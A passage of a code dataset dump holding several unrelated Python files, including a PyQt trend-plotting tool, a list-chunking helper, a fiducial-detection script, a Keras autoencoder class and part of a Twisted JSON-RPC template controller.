contain all the tools\r\n scroll_area = QScrollArea(self)\r\n scroll_area.setWidgetResizable(True)\r\n scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\r\n\r\n # scroll_widget is the widget in the scroll area\r\n scroll_widget = QWidget(scroll_area)\r\n scroll_area.setWidget(scroll_widget)\r\n\r\n # scroll_layout is the scroll area layout, it contains\r\n # tool_layout where all the tools are and a bit of stretch\r\n # tool_layout is saved so you can add tools to it later\r\n self.tool_layout = QVBoxLayout()\r\n self.tool_layout.setContentsMargins(0,0,0,0)\r\n self.tool_layout.setSpacing(0)\r\n scroll_layout = QVBoxLayout()\r\n scroll_layout.setContentsMargins(0,0,0,0)\r\n scroll_layout.setSpacing(0)\r\n scroll_layout.addLayout(self.tool_layout)\r\n scroll_layout.addStretch(1)\r\n\r\n scroll_widget.setLayout(scroll_layout)\r\n\r\n main_layout = QVBoxLayout()\r\n main_layout.setContentsMargins(0,0,0,0)\r\n main_layout.setSpacing(0)\r\n main_layout.addWidget(showme_button)\r\n main_layout.addWidget(clear_button)\r\n main_layout.addWidget(self.filter_textbox)\r\n main_layout.addWidget(scroll_area)\r\n main_layout.addWidget(refresh_button)\r\n self.setLayout(main_layout)\r\n\r\n def add_tagtools(self,tagtools):\r\n for t in tagtools:\r\n self._tools.append(t)\r\n self.tool_layout.addWidget(t)\r\n\r\n assert t.parent() != None, 'tagtool has no parent'\r\n\r\n def remove_tagtools(self):\r\n while True:\r\n try:\r\n tool = self._tools.pop()\r\n tool.setParent(None)\r\n except IndexError:\r\n break\r\n\r\n\r\n @QtCore.pyqtSlot(str)\r\n def filter_changed(self,filter_text):\r\n for tool in self._tools:\r\n if filter_text.lower() in tool.name.lower():\r\n tool.show()\r\n else:\r\n tool.hide()\r\n\r\n @QtCore.pyqtSlot()\r\n def clear_clicked(self):\r\n if DEBUG:\r\n print(\"ToolPanel::clear_clicked\")\r\n\r\n ans = QMessageBox.question(\r\n None,\r\n \"Confirm clear\",\"Are you sure you want to clear all plots?\"\r\n )\r\n if (ans != QMessageBox.Yes):\r\n 
if DEBUG:\r\n print(\"Didn't click yes on the messagebox\")\r\n return\r\n\r\n for tool in self._tools:\r\n try:\r\n tool.reset()\r\n except Exception as e:\r\n sys.stderr.write(e)\r\n\r\n if DEBUG:\r\n print(\"Emit clear clicked\")\r\n self.clear_click_signal.emit()\r\n \r\n\r\n\r\nclass TagTool(QWidget):\r\n '''\r\n A Widget that contain buttons to add tags to trends\r\n\r\n Signals:\r\n --------\r\n add_remove_plot : QtCore.Signal(str,bool)\r\n Signal to add/remove a plot from a plot window.\r\n '''\r\n\r\n add_remove_plot = QtCore.Signal(str,bool)\r\n\r\n def __init__(self,name):\r\n '''\r\n Constructing a tool also adds it to its parent ToolPanel's layout\r\n\r\n Parameters:\r\n -----------\r\n name : str\r\n tagname\r\n parent_toollist : ToolPanel\r\n Qt parent, this tool is also added to the toollist's layout\r\n\r\n '''\r\n QWidget.__init__(self)\r\n\r\n self.name = name\r\n self.plot_button = QPushButton(name)\r\n self.plot_button.setCheckable(True)\r\n self.plot_button.toggled.connect(self.plot_clicked)\r\n\r\n layout = QHBoxLayout()\r\n layout.setContentsMargins(0,0,0,0)\r\n layout.setSpacing(0)\r\n layout.addWidget(self.plot_button,1)\r\n\r\n self.setLayout(layout)\r\n\r\n\r\n @QtCore.pyqtSlot(bool)\r\n def plot_clicked(self,is_clicked):\r\n self.add_remove_plot.emit(self.name,is_clicked)\r\n\r\n def reset(self):\r\n self.blockSignals(True)\r\n self.plot_button.setChecked(False)\r\n self.blockSignals(False)\r\n\r\ndef add_grouping_rule(expr,color=None,sub=r'\\1',top=True):\r\n '''\r\n Add a rule to group trends.\r\n\r\n Each tag (column in dataframe) is passed through a regular expression\r\n defined in each rule. When a rule expression matches the tag, then the tag groupid and color is set\r\n as specified by the rule. Tags with the same groupid is plotted on the same\r\n axis.\r\n\r\n The regular expressions are evaluated by the 're' library. 
It is advised to\r\n set expr and sub as raw strings.\r\n\r\n Some defaults are configured already, try to run print_grouping_rules to see\r\n all the defined rules.\r\n\r\n Examples:\r\n ---------\r\n\r\n Example 1:\r\n The default is to return the first regex group as the groupid. This example\r\n returns a tag's stem as the groupid for SP and PV (note OP is not part of\r\n the group\r\n\r\n expr: r'(.*)\\.PV'\r\n color: 'blue'\r\n sub: r'\\\\1' (default)\r\n \r\n expr: r'(.*)\\.SP'\r\n color: 'yellow'\r\n sub: r'\\\\1' (default)\r\n \r\n\r\n Example 2:\r\n If you want to trend experion tags in the same group:\r\n\r\n expr: r'(.*)\\.(DACA|PIDA)\\.PV'\r\n color: 'blue'\r\n sub: r'\\\\1' (default)\r\n\r\n expr: r'(.*)\\.(DACA|PIDA)\\.SP'\r\n color: 'yellow'\r\n sub: r'\\\\1' (default)\r\n\r\n\r\n Example 3:\r\n Suppose you have indicators e.g. 00TI1234 that would be the PV of e.g.\r\n 00TC1234.SP. In this example, the groupid is set to 00TC1234 for both the\r\n TI and the TC. You need to make use of the substitute string because the\r\n first re group is not the groupid.\r\n\r\n expr: r'([0-9]{2,}.)I([0-9]{4,})'\r\n sub: r'\\\\1C\\\\2'\r\n color: 'blue'\r\n\r\n expr: r'([0-9]{2,}.)C([0-9]{4,})\\.SP'\r\n sub: r'\\\\1C\\\\2'\r\n color: 'blue'\r\n\r\n tag groupid\r\n ------------------------------\r\n 00TI1234 00TC1234\r\n 00TC1234.SP 00TC1234\r\n 11TC1234.OP None\r\n 22FI1001 22FC1234\r\n 22FC5005.SP 22FC5005\r\n 33AI1111 33AC1111\r\n\r\n\r\n \r\n\r\n Parameters:\r\n -----------\r\n expr : str\r\n regular expression to evaluate\r\n color : str\r\n matplotlib color of trend where tag matches expr\r\n sub : str, optional\r\n regular expression replacement str to return groupid. Default is r'\\\\1'\r\n which returns the first group in expr. If set to None, then a groupid\r\n of None is returned (tag is ungrouped).\r\n top : bool, optional\r\n Set to false to add rule to bottom of rule list. 
Default is to add\r\n rules to bottom of rule list, the first rule that evaluates is used.\r\n\r\n '''\r\n\r\n if top:\r\n TagInfo.taginfo_rules.insert(0,\r\n TagInfoRule(expr,color,sub)\r\n )\r\n else:\r\n TagInfo.taginfo_rules.append(\r\n TagInfoRule(expr,color,sub)\r\n )\r\n\r\ndef remove_grouping_rules(index=None):\r\n '''\r\n Remove grouping rules.\r\n Note: Rules are only applied when the dataframe is set, you need to set the\r\n dataframe again for this change to apply.\r\n\r\n Parameters:\r\n -----------\r\n index : int, optional\r\n Index of rule to remove. If None, clear all the grouping rules.\r\n\r\n '''\r\n global _isInit\r\n\r\n if _isInit:\r\n print(\"Warning: changing the grouping rules will not have an effect\",\r\n \"until you call set_dataframe() again.\")\r\n if index == None:\r\n TagInfo.taginfo_rules.clear()\r\n else:\r\n TagInfo.taginfo_rules.pop(index)\r\n\r\ndef print_grouping_rules():\r\n '''\r\n Print all grouping rules.\r\n '''\r\n print(\"{:<3} {:<60} {:^10} {}\".format(\"\",\"expr\",\"color\",\"sub\"))\r\n print(\"{:->80}\".format(''))\r\n for i in range(len(TagInfo.taginfo_rules)):\r\n rule = TagInfo.taginfo_rules[i]\r\n if rule.sub == None:\r\n sub = 'None'\r\n else:\r\n sub = rule.sub\r\n if rule.color == None:\r\n col = 'None'\r\n else:\r\n col = rule.color\r\n print(\"{:<3} {:<60} {:^10} {}\"\\\r\n .format(i, rule.expr, col, sub )\r\n )\r\n\r\ndef load_grouping_template(template):\r\n '''\r\n Load a preconfigured grouping rule template instead of configuring grouping\r\n rules manually. 
\r\n\r\n Templates\r\n ---------\r\n ProfCon : Honeywell Profit Controller history\r\n - Groups .READVALUE, .HIGHLIMIT, .LOWLIMIT, .SSVALUE, .UNBIASEDMODELPV\r\n per tag\r\n - Groups .CONSTRAINTTYPE and .STATUS for MVs and CVs\r\n DMC : Aspentech DMC plus history\r\n - Groups .ULINMD .LLINDM .VIND .SSMAN .LDEPTG .UDEPTG .SSDEP per tag\r\n - Groups .SRVDEP for all tags\r\n - Groups .SRIIND for all tags\r\n - Groups .CSIDEP for all tags\r\n - Groups .CSIIND for all tags\r\n\r\n\r\n Parameters\r\n ----------\r\n template : string\r\n String to define template.\r\n '''\r\n\r\n global _isInit\r\n\r\n if _isInit:\r\n print(\"Warning: changing the grouping rules will not have an effect\",\r\n \"until you call set_dataframe() again.\")\r\n \r\n\r\n\r\n if template == 'ProfCon':\r\n add_grouping_rule(r'(.*)\\.READVALUE','C0')\r\n add_grouping_rule(r'(.*)\\.HIGHLIMIT','red')\r\n add_grouping_rule(r'(.*)\\.LOWLIMIT','red')\r\n add_grouping_rule(r'(.*)\\.SSVALUE','cyan')\r\n add_grouping_rule(r'(.*)\\.UNBIASEDMODELPV','purple')\r\n add_grouping_rule(r'(.*)(CV|MV)[0-9]{1,2}\\.CONSTRAINTTYPE',sub=r'\\2_CONSTRAINTTYPE')\r\n add_grouping_rule(r'(.*)(CV|MV)[0-9]{1,2}\\.STATUS',sub=r'\\2_STATUS')\r\n elif template == 'DMC':\r\n # DMC has catch-all at bottom of list because .VIND and .DEP are not marked.\r\n add_grouping_rule(r'(.*)','C0',top=False)\r\n\r\n # MV Parameters\r\n add_grouping_rule(r'(.*)\\.ULINDM','red')\r\n add_grouping_rule(r'(.*)\\.LLINDM','red')\r\n add_grouping_rule(r'(.*)\\.SSMAN','cyan')\r\n add_grouping_rule(r'(.*)\\.ETMV','lightgreen')\r\n add_grouping_rule(r'(.*)\\.VINDSP','gray')\r\n\r\n # CV Parameters\r\n add_grouping_rule(r'(.*)\\.UDEPTG','red')\r\n add_grouping_rule(r'(.*)\\.LDEPTG','red')\r\n add_grouping_rule(r'(.*)\\.SSDEP','cyan')\r\n add_grouping_rule(r'(.*)\\.ETCV','lightgreen')\r\n add_grouping_rule(r'(.*)\\.PRDMDLD','magenta')\r\n\r\n # Ramp Parameters\r\n add_grouping_rule(r'(.*).LRDPTG','red',r'\\1_RAMP')\r\n 
add_grouping_rule(r'(.*).URDPTG','red',r'\\1_RAMP')\r\n add_grouping_rule(r'(.*).SSRDEP','cyan',r'\\1_RAMP')\r\n add_grouping_rule(r'(.*).RAMPSP','yellow')\r\n\r\n # Generic Variable parameters: e.g. plot all CV statuses on the same\r\n # trend\r\n add_grouping_rule(r'(.*)\\.SRVDEP',sub='SRVDEP')\r\n add_grouping_rule(r'(.*)\\.SRIIND',sub='SRIIND')\r\n add_grouping_rule(r'(.*)\\.CSIDEP',sub='CSIDEP')\r\n add_grouping_rule(r'(.*)\\.CSIIND',sub='CSIIND')\r\n\r\n \r\n else:\r\n print(\"Unknown template {}\".format(template))\r\n\r\n \r\ndef set_legend_fontsize(size):\r\n '''\r\n Parameters:\r\n -----------\r\n size : int or {'xx-small', 'x-small', 'small', 'medium', 'large', 'x-large', 'xx-large'}\r\n font size that can be passed to a matplotlib axes.legend function\r\n\r\n '''\r\n plot_manager.legend_fontsize = size\r\ndef set_legend_loc(loc):\r\n '''\r\n Parameters:\r\n -----------\r\n loc : int or string\r\n legend location that can be passed to matplotlib axes.legend function.\r\n =============== =============\r\n Location String Location Code\r\n =============== =============\r\n 'best' 0\r\n 'upper right' 1\r\n 'upper left' 2\r\n 'lower left' 3\r\n 'lower right' 4\r\n 'right' 5\r\n 'center left' 6\r\n 'center right' 7\r\n 'lower center' 8\r\n 'upper center' 9\r\n 'center' 10\r\n =============== =============\r\n '''\r\n plot_manager.legend_loc = loc\r\n\r\ndef set_dataframe(df):\r\n '''\r\n Set the dataframe to use for plotting.\r\n\r\n The dataframe must be set before the tool will work.\r\n\r\n Parameters:\r\n -----------\r\n df : pandas.core.frame.DataFrame\r\n Dataframe to plot\r\n '''\r\n global _isInit\r\n global _df\r\n global main_window\r\n global tool_panel\r\n global plot_window\r\n global plot_manager\r\n\r\n # Check if dataframe has datetime index, this is not required but a\r\n # worthwhile error check\r\n if type(df.index) != pandas.DatetimeIndex:\r\n sys.stderr.write(\"WARNING: Dataframe does not have a datetime index\\n\")\r\n\r\n if 
_isInit:\r\n tool_panel.remove_tagtools()\r\n\r\n plot_manager.set_dataframe(df)\r\n tool_panel.add_tagtools( plot_manager.get_tagtools() )\r\n\r\n _isInit = True\r\n\r\n\r\ndef show():\r\n '''\r\n Show the plot window.\r\n '''\r\n global main_window\r\n global _isInit\r\n global _execApp\r\n\r\n if not _isInit:\r\n sys.stderr.write('Dataframe is not initialised, use set_dataframe to'\r\n +' initialise dataframe\\n')\r\n return\r\n\r\n main_window.show()\r\n\r\n if DEBUG:\r\n print(\"Showing main window\")\r\n\r\n if _execApp:\r\n app.exec_()\r\n app.exit()\r\n\r\ndef set_exec_on_show(on=True):\r\n '''\r\n Set whether Qt app .exec function should be called on show(). When\r\n proc_plot is used in a jupyter notebook with %matplotlib qt magic then the\r\n gui loop is already running and starting it again will break the app.\r\n proc_plot tries to figure it out automatically but you can override the\r\n setting with this function.\r\n\r\n Parameters:\r\n -----------\r\n on : bool, optional\r\n set to False to disable runnnig app.exec.\r\n\r\n '''\r\n global _execApp\r\n _execApp = on\r\n\r\n_isInit = False # has the window been initialised with a dataframe?\r\n_execApp = True # if started with qt, gui loop is running\r\n\r\nif DEBUG:\r\n print(\"Backend: \", plt.get_backend())\r\n\r\nif (plt.get_backend().lower() == 'qt5agg' and\r\n plt.isinteractive() ):\r\n # looks like you are running a jupyter notebook with %matplotlib qt\r\n _execApp = False\r\n print(\"It looks like you are running a jupyter notebook with \" \\\r\n +\"%matplotlib qt magic.\\nThe gui loop is disabled, if you \" \\\r\n +\"want to enable it, use proc_plot.set_exec_on_show()\")\r\n\r\napp = QtCore.QCoreApplication.instance()\r\nif app is None:\r\n app = QApplication([])\r\n if DEBUG:\r\n print(\"app was None\")\r\n\r\ninteractive = plt.isinteractive()\r\nif interactive:\r\n plt.ioff()\r\n\r\nmain_window = QWidget()\r\nplot_manager = PlotManager(main_window)\r\ntool_panel = 
ToolPanel(main_window)\r\n\r\ntool_panel.showme_clicked.connect(plot_manager.showme)\r\ntool_panel.clear_click_signal.connect(plot_manager.clear_all_plots)\r\ntool_panel.refresh_click_signal.connect(plot_manager.refresh)\r\n\r\nlayout = QHBoxLayout()\r\nlayout.addWidget(tool_panel,0)\r\nlayout.addWidget(plot_manager.plot_window,1)\r\nmain_window.setLayout(layout)\r\n#del layout\r\n\r\n\r\nif interactive:\r\n plt.ion()\r\n","repo_name":"fpieterse/proc_plot","sub_path":"proc_plot/pp.py","file_name":"pp.py","file_ext":"py","file_size_in_byte":33248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"29489744399","text":"# 切割串列,根据指定的长度切成好几块\ndef group(iterable,size):\n result = []\n li = list(iterable)#将可迭代者转成list\n length=len(li)\n for i in range(0,length,size):#一你要的长度开始迭带到最大长度\n result.append(li[i:i+size])#加入可迭代者串列的长度个数,如果最后小于所需长度,全部加入\n return result\n\nif __name__ == '__main__':\n lst = [4,8,9,5,7,2,1,7,4,9]\n print(group(lst,4))\n tup = (4,8,9,5,7,2,1,7,4,9)\n print(group(tup,4))\n","repo_name":"CYCEvans/PYTHON_yehnan","sub_path":"CH4/ch04_group.py","file_name":"ch04_group.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"35403526385","text":"#!/usr/bin/env python\nimport numpy as np\nfrom template_0.slid_win import sliding_windows\nfrom process import shi_tomasi\nfrom refinement import refinement_axial\nfrom sklearn.cluster import DBSCAN\n\ndef template2(img):\n return shi_tomasi(img, maxCorners=10, qualityLevel=0.25)\n\ndef god_function(list_axial, list_coronal, list_sagittal): \n length = len(list_axial)\n\n corners = []\n for z in range(63, length):\n if z in range(90, 111):\n continue\n shi = template2(list_axial[z])\n corners.extend([list(corn) + [z] for corn in shi])\n\n #print(\"Refining...\")\n #raw = refinement_axial(corners, list_axial.shape[::-1], mode='soft')\n raw = corners\n 
print(\"Clustering...\")\n clust = DBSCAN(eps=50, leaf_size=14, min_samples=1)\n predictions = clust.fit_predict(raw)\n labels = set(predictions)\n final = []\n for label in list(labels):\n centroid = [0, 0, 0]\n count = 0\n for i in range(len(raw)):\n if predictions[i] == label:\n count += 1\n centroid[0] += raw[i][0]\n centroid[1] += raw[i][1]\n centroid[2] += raw[i][2]\n centroid[0] /= count\n centroid[1] /= count\n centroid[2] /= count\n final.append(centroid)\n return final\n\n","repo_name":"rharish101/Fiducial","sub_path":"final_python.py","file_name":"final_python.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"69981750495","text":"from tensorflow import keras\n\nfrom .base import BaseAutoEncoder\n\n\nclass AutoEncoder(BaseAutoEncoder):\n def __init__(\n self,\n input_shape=(128, 128, 3),\n z_dim=64,\n encoder_weights_path=None,\n decoder_weights_path=None,\n autoencoder_weights_path=None,\n ):\n\n self.input_shape = input_shape\n self.n_channels = input_shape[-1]\n self.z_dim = z_dim\n\n self.encoder = self.build_encoder()\n self.decoder = self.build_decoder()\n\n if encoder_weights_path is not None:\n self.encoder.load_weights(encoder_weights_path)\n\n if decoder_weights_path is not None:\n self.decoder.load_weights(decoder_weights_path)\n\n self.model = self.build_autoencoder()\n\n if autoencoder_weights_path is not None:\n self.model.load_weights(autoencoder_weights_path)\n self.predict = self.predict_autoencoder\n else:\n self.predict = self.predict_encoder_decoder\n\n self.autoencoder = self.model\n","repo_name":"isaaccorley/Privacy-Encoder","sub_path":"privacy_encoder/models/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"36755124956","text":"from twisted.internet import defer, threads\nfrom 
twisted.web import server\nfrom txjsonrpc.web import jsonrpc\nfrom txjsonrpc.web.jsonrpc import Proxy\nfrom twisted.python import log\n\nimport jsonpickle, sqlite3, cPickle\nimport Queue\n\nfrom core.utils import RetVal\nfrom core.topology import Topology\nfrom core.templatedef import TemplateDefinition\nfrom core.templateins import TemplateInstance\nfrom core.templaterun import TemplateRun\nfrom core.returnvalue import *\nfrom core.block import VariableInfo, BlockInfo\nfrom core.comphandler import *\n\nclass Controller(jsonrpc.JSONRPC,object):\n\tdef __init__(self, dbnodes, dbtemplates, datafile_dir, queue, port = None):\n\t\tself.__name = \"Controller\"\n\t\tself.__port = port\n\t\tself.__dbnodes = dbnodes\n\t\tself.__dbtemplates = dbtemplates\n\t\tself.__datafile_dir = datafile_dir\n\t\tself.__run_queue = Queue.Queue()\n\t\tself.__rescue_queue = Queue.Queue()\n\t\tself.__dead_nodes_queue = queue\n\t\t# look for orphan comps\n\t\tself.__corph = CompOrphan(self.__dbnodes, self.__rescue_queue, self.__dead_nodes_queue)\n\t\tself.__corph.start()\n\t\t# rescue comps\n\t\tself.__cres = CompRescue(self.__dbnodes, self.__run_queue, self.__rescue_queue)\n\t\tself.__cres.start()\n\t\t# start/stop compositions\n\t\tself.__chand = CompHandler(self.__dbnodes, self.__run_queue, self.__rescue_queue)\n\t\tself.__chand.start()\n\n\tdef __get_tempdef_from_id(self, temp_id):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\tretcode = conn.execute(\"select template from templatedefs where temp_id = ?\", (temp_id,))\n\t\ttemp = retcode.fetchone()\n\t\treturn ( TemplateDefinition(temp[0]) if temp else None)\n\n\tdef __select_nodes(self, num_nodes = 1):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tconn.text_factory = str\n\t\t\tretcode = conn.execute(\"select ip,port from bmnodes limit ?\", (num_nodes,))\n\t\timport random\n\t\t#FIX THIS: pick a random port?\n\t\treturn [ (ip,port,random.randint(10000,10100)) for (ip,port) in retcode 
]\n\n\t#################################\n\t# JSONRPC: TEMPLATE DEFINITIONS #\n\t#################################\n\tdef __put_template(self, temp_id, temp):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\ttry:\n\t\t\t\tconn.execute(\"insert into templatedefs (temp_id,template) values (?,?)\", (temp_id,temp))\n\t\t\texcept sqlite3.IntegrityError: \n\t\t\t\treturn RetVal.CODE_FAILURE\n\t\treturn RetVal.CODE_SUCCESS\n\n\tdef __remove_template(self, temp_id):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\tretcode = conn.execute(\"delete from templatedefs where temp_id = ? \", (temp_id,))\n\t\treturn retcode.rowcount\n\n\tdef __get_templates(self):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\tretcode = conn.execute(\"select temp_id from templatedefs\")\n\t\treturn [ row[0] for row in retcode ]\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_put_template(self, temp):\n\t\t\"\"\"\\brief receive template definitions\n\t\t\\param temp (\\c string) xml template definition\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received put_template definition request\", system = self.__name)\n\t\ttempdef = TemplateDefinition(temp)\n\t\tif tempdef.dom is None:\n\t\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"not well-formed template\", None)\n\t\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\ttemp_id = tempdef.temp_id\n\t\tretcode = yield threads.deferToThread(self.__put_template, temp_id, temp)\n\t\tmsg = (\"added template definition\" if retcode is RetVal.CODE_SUCCESS else \"template already exists\")\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, msg, None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_remove_template(self, temp_id):\n\t\t\"\"\"\\brief remove a given template definition based on the template definition id\n\t\t\\param temp_id (\\c string) template definition ID\n\t\t\\return (\\c ReturnValue) Value member is 
empty\n\t\t\"\"\"\n\t\tlog.msg(\"received remove_template definition request\", system = self.__name)\n\t\tdeleted = yield threads.deferToThread(self.__remove_template, temp_id)\n\t\tmsg = (\"deleted template definition\" if deleted else \"template does not exist\")\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, msg, None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_templates(self):\n\t\t\"\"\"\\brief return the list of existing templates definitions \n\t\t\\return (\\c ReturnValue) The template definitions' XML (list[string])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_templates request\", system = self.__name)\n\t\ttemplates = yield threads.deferToThread(self.__get_templates)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"list of template definitions\", templates)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\n\t###############################\n\t# JSONRPC: TEMPLATE INSTANCES #\n\t###############################\n\n\tdef __is_temp_running(self,temp_id):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tretcode = conn.execute(\"select comp_id from comps where temp_id = ?\", (temp_id,))\n\t\tcomps = [row[0] for row in retcode]\n\t\treturn (True if len(comps) else False)\n\n\tdef __invoke_template(self, temp, ext_nodes):\n\t\t\"\"\"\\brief invoke a template instance\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\param ext_nodes (\\c list) list of nodes\n\t\t\\return (\\c RetVal) \n\t\t\"\"\"\n\t\ttins = TemplateInstance(temp)\n\t\ttemp_id = tins.temp_id\n\t\tif self.__is_temp_running(temp_id):\n\t\t\tlog.msg(\"template already running\", system = self.__name)\n\t\t\treturn RetVal.CODE_SUCCESS\n\t\ttdef = self.__get_tempdef_from_id(temp_id)\n\t\tif not tdef:\n\t\t\tlog.msg(\"no template definition for the given id\", system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\tt = TemplateRun(tdef, tins, self.__datafile_dir)\n\t\tif t.install() is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while 
installing template\", system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\tnum_nodes = t.get_num_nodes()\n\t\tif len(ext_nodes) > 0: nodes = ext_nodes\n\t\telse: nodes = self.__select_nodes(num_nodes = num_nodes)\n\n\t\tif len(nodes) < num_nodes :\n\t\t\tlog.msg(\"%d node(s) available (%d needed)\" % (len(nodes),num_nodes), system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\t#if t.assign_nodes(nodes) is RetVal.CODE_FAILURE:\n\t\tif t.assign_nodes(nodes)[0] is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while assigning nodes to template\", system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\tlog.msg(\"send comps to the run queue\", system = self.__name)\n\t\tfor comp in t.compsrun: \n\t\t\tself.__run_queue.put( (temp_id,comp,'start_composition') )\n\t\treturn RetVal.CODE_SUCCESS\n\n\tdef __stop_template(self, temp_id):\n\t\tlog.msg(\"stopping template instance %s\" % temp_id, system = self.__name)\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tretcode = conn.execute(\"select compobj from comps where temp_id = ?\", (temp_id,))\n\t\tcomps_db = [comp[0] for comp in retcode]\n\t\tfor comp_db in comps_db:\n\t\t\tcomp = cPickle.loads(str(comp_db))\n\t\t\tself.__run_queue.put( (temp_id,comp,'stop_composition') )\n\t\treturn RetVal.CODE_SUCCESS\n\n\tdef __expand_template(self, temp):\n\t\t\"\"\"\\brief expand a template instance\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\return (\\c RetVal,list) list is None or the list of nodes \n\t\t\"\"\"\n\t\ttins = TemplateInstance(temp)\n\t\ttemp_id = tins.temp_id\n\t\tif self.__is_temp_running(temp_id):\n\t\t\tlog.msg(\"template already running\", system = self.__name)\n\t\t\treturn (RetVal.CODE_SUCCESS, None)\n\t\ttdef = self.__get_tempdef_from_id(temp_id)\n\t\tif not tdef:\n\t\t\tlog.msg(\"no template definition for the given id\", system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\tt = TemplateRun(tdef, tins, self.__datafile_dir)\n\t\tif t.install() is 
RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while installing template\", system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\tnum_nodes = t.get_num_nodes()\n\t\tnodes = self.__select_nodes(num_nodes = num_nodes)\n\t\tif len(nodes) < num_nodes :\n\t\t\tlog.msg(\"%d node(s) available (%d needed)\" % (len(nodes),num_nodes), system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\t(retval,all_info) = t.assign_nodes(nodes)\n\t\tif retval is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while assigning nodes to template\", system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\treturn (RetVal.CODE_SUCCESS,all_info)\n\t\t#return (RetVal.CODE_SUCCESS,nodes)\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_invoke_template(self, temp, nodes = []):\n\t\t\"\"\"\\brief listen for template invocation request\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\param auth (\\c boolean) authorization from WPOC needed\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received invoke_template request\", system = self.__name)\n\t\ttempins = TemplateInstance(temp)\n\t\tif tempins.dom is None:\n\t\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"not well-formed template\", None)\n\t\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\tretcode_dict = None\n\t\tretcode = yield threads.deferToThread(self.__invoke_template,temp, nodes)\n\t\tif retcode is RetVal.CODE_SUCCESS:\n\t\t\tcode,msg = ReturnValue.CODE_SUCCESS,\"invocation sent to nodes\"\n\t\telse:\n\t\t\tcode,msg = ReturnValue.CODE_FAILURE,\"error during invocation\"\n\t\tr = ReturnValue(code, msg, None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_stop_template(self, temp_id):\n\t\t\"\"\"\\brief stop a running template instance \n\t\t\\param temp_id (\\c string) template instance ID\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received stop_template request\", system = 
self.__name)\n\t\tretcode = yield threads.deferToThread(self.__stop_template,temp_id)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"stop request sent to nodes\", None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_expand_template(self, temp):\n\t\t\"\"\"\\brief listen for requests to expand template\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\return (\\c ReturnValue) Value member contains a list of (ip,port,port_in_use,comp_xml)\n\t\t\"\"\"\n\t\tlog.msg(\"received expand_template request\", system = self.__name)\n\t\ttempins = TemplateInstance(temp)\n\t\tif tempins.dom is None:\n\t\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"not well-formed template\", None)\n\t\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\tretcode_dict = None\n\t\t(retcode,nodes) = yield threads.deferToThread(self.__expand_template,temp)\n\t\tif retcode is RetVal.CODE_SUCCESS:\n\t\t\tcode,msg = ReturnValue.CODE_SUCCESS,\"template expanded\"\n\t\t\tvalue = nodes\n\t\telse:\n\t\t\tcode,msg = ReturnValue.CODE_FAILURE,\"error during expansion\"\n\t\t\tvalue = None\n\t\tr = ReturnValue(code, msg, value)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t#######################\n\t# JSONRPC: BLOCK INFO #\n\t#######################\n\n\tdef __parse_get_variable(self, ret_values):\n\t\toutmsg = []\n\t\tfor (success,retval) in ret_values:\n\t\t\tif success: outmsg.append(jsonpickle.decode(retval))\n\t\treturn outmsg\n\n\tdef 